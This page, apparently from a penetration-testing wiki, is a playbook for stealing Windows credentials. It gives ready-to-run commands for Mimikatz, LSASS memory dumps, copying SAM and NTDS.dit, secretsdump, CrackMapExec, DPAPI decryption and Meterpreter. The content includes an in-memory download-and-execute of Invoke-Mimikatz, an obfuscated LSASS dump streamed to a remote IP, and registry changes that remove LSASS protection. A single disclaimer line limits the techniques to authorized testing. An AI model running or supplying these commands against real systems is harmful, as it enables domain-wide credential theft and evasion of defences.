Skip to main content

Overview

Windows stores credentials in multiple locations including LSASS process memory, the SAM database, NTDS.dit (Active Directory), and the DPAPI master key store. This page covers how to extract credentials from each location during authorized assessments.
Credential theft techniques are for authorized penetration testing and red team operations only. These techniques are highly impactful and must only be used with explicit written authorization.

Mimikatz

Mimikatz is the primary tool for Windows credential extraction: 
# Elevate privileges and extract everything
mimikatz "privilege::debug" "token::elevate" \
  "sekurlsa::logonpasswords" \
  "lsadump::lsa /inject" \
  "lsadump::sam" \
  "lsadump::cache" \
  "sekurlsa::ekeys" \
  "exit"

# Individual commands
privilege::debug          # Enable debug privilege (may fail if already admin)
token::elevate            # Impersonate SYSTEM token
sekurlsa::logonpasswords  # Extract from LSASS memory
lsadump::lsa /inject      # Extract from LSA service
lsadump::sam              # Extract from SAM database

PowerShell Invoke-Mimikatz

IEX (New-Object System.Net.Webclient).DownloadString(
  'https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds

LSASS Dumping Methods

Procdump (Microsoft Signed)

Procdump from Sysinternals is a legitimate Microsoft-signed binary, not flagged by Defender: 
# Local dump
C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Remote (from live.sysinternals.com)
net use Z: https://live.sysinternals.com
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
Then extract credentials: 
# Load and parse with Mimikatz
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords

comsvcs.dll (No Upload Required)

# Get LSASS PID
Get-Process -Name LSASS

# Dump using built-in DLL
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass_pid> lsass.dmp full

Task Manager (GUI Method)

  1. Right-click Task Bar → Task Manager → More Details
  2. Find “Local Security Authority Process” in Processes tab
  3. Right-click → “Create dump file”

PPLBlade (Bypasses Protected Process Light)

PPLBlade dumps LSASS while:
  • Bypassing PPL protection
  • Obfuscating the dump file to evade Defender signatures
  • Supporting fileless (in-memory) upload via RAW or SMB
PPLBlade.exe --mode dump --name lsass.exe --handle procexp \
  --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

LalsDumper (SSP-Based — No MiniDumpWriteDump)

Advanced three-stage dumper that loads a malicious SSP into LSASS, never calling MiniDumpWriteDump:
  1. Stage 1 (lals.exe) — patches fdp.dll placeholder with path to rtu.txt, saves as nfdp.dll, calls AddSecurityPackageA("nfdp","fdp") to force LSASS to load the rogue SSP
  2. Stage 2 (inside LSASS) — rogue DLL reads rtu.txt, XORs with 0x20, maps decoded shellcode
  3. Stage 3 — reimplements MiniDump logic via direct syscalls, streams compressed LSASS dump to %TEMP%\<pid>.ddt
# Keep all files in same directory: lals.exe, fdp.dll, rtu.txt
# Running lals.exe requires admin/SeTcb rights
# Output: %TEMP%\<pid>.ddt — decompress, then use with Mimikatz/Volatility

SAM and SYSTEM Extraction

The SAM database stores local account hashes and requires SYSTEM access to read directly.

From Registry

reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
Extract hashes on attacker machine: 
samdump2 SYSTEM SAM
impacket-secretsdump -sam sam -security security -system system LOCAL

Volume Shadow Copy

# Create shadow copy
vssadmin create shadow /for=C:

# Copy SAM from shadow (replace HarddiskVolumeShadowCopy8 with your copy number)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SAM C:\Extracted\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit C:\Extracted\ntds.dit
PowerShell alternative: 
$service=(Get-Service -name VSS)
if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" C:\Users\Public
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\system" C:\Users\Public
cmd /c copy "$($volume.DeviceObject)\windows\ntds\ntds.dit" C:\Users\Public
$volume.Delete();if($notrunning -eq 1){$service.Stop()}

NTDS.dit — Active Directory Database

The NTDS.dit file is the AD database containing all domain user password hashes. Hash decryption requires three layers:
  1. Decrypt PEK (Password Encryption Key) using BOOTKEY + RC4
  2. Decrypt hash using PEK + RC4
  3. Decrypt hash using DES

Copy NTDS.dit

# Using ntdsutil (Windows Server 2008+)
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit

Extract Hashes

# Impacket secretsdump (remote — requires DA credentials)
secretsdump.py -just-dc-ntlm <DOMAIN>/<DA_USER>@<DOMAIN_CONTROLLER>

# Local extraction
secretsdump.py LOCAL -ntds ntds.dit -system SYSTEM -outputfile credentials.txt

# For large NTDS.dit files
gosecretsdump -ntds ntds.dit -system SYSTEM

Export NTDS to SQLite

ntdsdotsqlite ntds.dit -o ntds.sqlite --system SYSTEM.hive
# Extracts: user/machine accounts, hashes, UAC flags, group membership, OUs, trust info

CrackMapExec Credential Dumping

# Dump SAM hashes
cme smb 192.168.1.0/24 -u UserName -p 'PASSWORD' --sam

# Dump LSA secrets
cme smb 192.168.1.0/24 -u UserName -p 'PASSWORD' --lsa

# Dump NTDS.dit from DC
cme smb 192.168.1.100 -u UserName -p 'PASSWORD' --ntds

DPAPI — Decrypting Stored Credentials

DPAPI protects stored credentials, browser passwords, and PowerShell credentials: 
# Locate DPAPI master keys
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect\

# Locate DPAPI-protected credential files
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\

# Mimikatz DPAPI decryption
dpapi::masterkey /pvk:backupkey.pvk /in:MasterKeyFile
dpapi::cred /masterkey:<key> /in:CredentialFile

# Extract master keys from memory (requires SYSTEM)
sekurlsa::dpapi

Mining Idle RDP Sessions

After compromise, harvest credentials from users with active RDP sessions: 
# Find outbound RDP targets from all user hives
Get-ChildItem HKU:\ | Where-Object { $_.Name -match "S-1-5-21" } | ForEach-Object {
    Get-ChildItem "${_.Name}\SOFTWARE\Microsoft\Terminal Server Client\Servers" -EA SilentlyContinue |
      ForEach-Object {
          $server = Split-Path $_.Name -Leaf
          $user = (Get-ItemProperty $_.Name).UsernameHint
          "OUT:$server:$user:$((Get-Item $_.Name).LastWriteTime)"
      }
}

# Find inbound RDP evidence (Event IDs 21=logon, 25=disconnect)
Get-WinEvent -LogName "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" `
  | Where-Object { $_.Id -in 21,25 } `
  | Select-Object TimeCreated,@{n='User';e={$_.Properties[1].Value}},@{n='IP';e={$_.Properties[2].Value}}

Registry Downgrades for Credential Theft

FinalDraft-style implants set registry keys to enable credential theft: 
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 0 /f
  • DisableRestrictedAdmin=1 — enables full credential/ticket reuse during RDP (Pass-the-Hash via RDP)
  • LocalAccountTokenFilterPolicy=1 — disables UAC token filtering over the network
  • RunAsPPL=0 — removes LSASS PPL protection, making memory dumps trivial

Invoke-NinjaCopy

Invoke-NinjaCopy can read files locked by the OS (SAM, NTDS.dit, SYSTEM hive) without VSS: 
# Copy SAM and SYSTEM hives while locked
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "C:\temp\SAM"
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "C:\temp\SYSTEM"

# Extract from SAM offline
secretsdump.py -sam C:\temp\SAM -system C:\temp\SYSTEM LOCAL

Meterpreter Credential Harvesting

If you have a Meterpreter shell: 
# Load kiwi (in-memory Mimikatz)
meterpreter> load kiwi
meterpreter> creds_all          # All credentials
meterpreter> lsa_dump_sam       # SAM hashes
meterpreter> lsa_dump_secrets   # LSA secrets

# Using Metasploit module
msf> use post/multi/recon/local_exploit_suggester
msf> use post/windows/gather/credentials/credential_collector
msf> use post/windows/gather/smart_hashdump

Additional Tools

# Lazagne — extracts credentials from many applications
lazagne.exe all

# Windows Credentials Editor
wce.exe -w   # List passwords in memory

# fgdump / PwDump7 — SAM extraction
fgdump.exe
PwDump.exe -o outpwdump -x 127.0.0.1

References

Build docs developers (and LLMs) love

Get started for freeTalk to us